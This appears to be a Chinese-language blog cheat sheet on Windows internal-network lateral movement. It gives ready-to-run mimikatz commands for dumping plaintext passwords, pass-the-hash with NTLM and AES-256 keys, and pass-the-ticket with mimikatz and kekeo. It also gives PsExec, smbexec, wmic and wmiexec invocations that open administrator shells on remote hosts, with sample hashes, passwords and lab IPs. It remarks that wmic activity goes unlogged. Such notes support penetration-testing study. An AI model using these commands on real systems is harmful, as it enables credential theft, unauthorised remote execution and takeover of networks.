前期：信息搜集
mimikatz获取明文密码

mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords

在这里插入图片描述

在windows 2012以上系统需要修改注册表搭配procdump+mimikatz 获取明文密码密码

哈希传递（pass the hash pth）

1.利用ntlm hash 进行哈希传递

连接工作组账户：

mimikatz # privilege::debug     //提升权限
mimikatz #sekurlsa::pth /user:administrator /domain:workgroup /ntlm:23ae064d483cef543b50d07fc48756c7  //传递哈希
dir \\192.168.1.3\c$         //ip连接
dir \\WIN7-X64\c$            //计算机名连接

在这里插入图片描述

连接域账户：

mimikatz # privilege::debug  //提升权限
mimikatz # sekurlsa::pth /user:tom /domain:HACKE /ntlm:23ae064d483cef543b50d07fc48756c7//传递哈希
c:\windows\system32> dir \\192.168.1.4\c$     //ip连接
c:\windows\system32> dir \\WIN2008-X64\c$     //计算机名连接

在这里插入图片描述

当主机打了KB2871997补丁后只能通过administrator连接

2.利用AES-256密钥进行哈希传递(目标主机需要打补丁才能利用）

mimikatz # privilege::debug //提升权限
mimikatz # sekurlsa::ekeys //收集aes256值
mimikatz # sekurlsa::pth /user:administrator /domain:hacke.testlab /aes256:7af74de6fbed6238cb8b66bbcf1471ac432c2bd8b5c86900819ff6154e15c287 //利用aes-256密钥进行哈希传递
c:\windows\system32> dir \\\192.168.1.1\c$    //列出c盘内容

票据传递（pass the ticket ptt）

使用mimikatz进行票据传递

privilege::Debug                    //提升权限
sekurlsa::tickets /export //导出内存中的票据
kerberos::purge           //清楚内存中的票据
kerberos::ptt "c:\user\tom\desktop\[0;5f440]-2-1-40e10000-tom@krbtgt-HACKE.TESTLAB.kirbi"         //将票据文件注入内存
dir \\\dc.hacke.testlab\c$     //列出c盘内容

使用kekeo进行票据传递

webserver> kekeo.exe "tgt::ask /user:webserver /domain:hacke.testlab /ntlm:7f637193ea31437df8c719eb804d1b66" //生成票据文件
kekeo # klist purge //清除内存中其他票据
kekeo # kerberos::ptt [TGT_webserver@HACKE.TESTLAB_krbtgt](mailto:TGT_webserver@HACKE.TESTLAB_krbtgt)~hacke.testlab@HACKE.TESTLAB.kirbi //将票据文件导入内存
webserver>dir \\192.168.1.1\c$ //列出c盘内容

Psexec

pstools是微软的一个安全管理工具套件

1.在有ipc$连接的基础上，执行如下命令会返回一个administrator的shell

net use \\192.168.1.4\ipc$ "123.com" /user:administrator
PsExec64.exe -accepteula \\\192.168.1.4 cmd.exe

在这里插入图片描述

2.没有ipc$l连接时

psexec.exe \\192.168.1.3 -u administrator -p 123.com cmd.exe //指定账号密码获取shell

smbexec

smbexec 可以通过文件共享（admin，c，ipc，d）在远程系统中执行命令。

windows-impacket下载:https://gitee.com/RichChigga/impacket-examples-windows

smbexec.exe ./administrator:123.com@192.168.1.4 //连接工作组
smbexec.exe HACKE\administrator:wangwei123_@192.168.1.1 //连接域控

Wmic

wmic(windows management instrumentation)适用所有的 Windows操作系统中，并由一组强大的工具集合组成，用于管理本地或远程的 Windows 系统，攻击者使用 wmi 来进行攻击，但 Windows 系统默认不会在日志中记录这些操作，可以做到无日志

wmic /node:192.168.1.4 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig >c:\ip.txt"

在这里插入图片描述

因为wmic命令没有回显所以需要建立ipc$连接再用type命令读取文件。

net use \\192.168.1.4\ipc$ "123.com" /user:administrator //建立Ipc
type \\\192.168.1.4\c$\ip.txt //使用type命令读取ip.txt

impacket包中的wmiexec

wmiexec.exe ./administrator:123.com@192.168.1.4 //连接工作组
wmiexec.exe HACKE/administrator:wangwei123_@192.168.1.1 //连接域控

内网横向渗透

哈希传递（pass the hash pth）

票据传递（pass the ticket ptt）

Psexec

smbexec

Wmic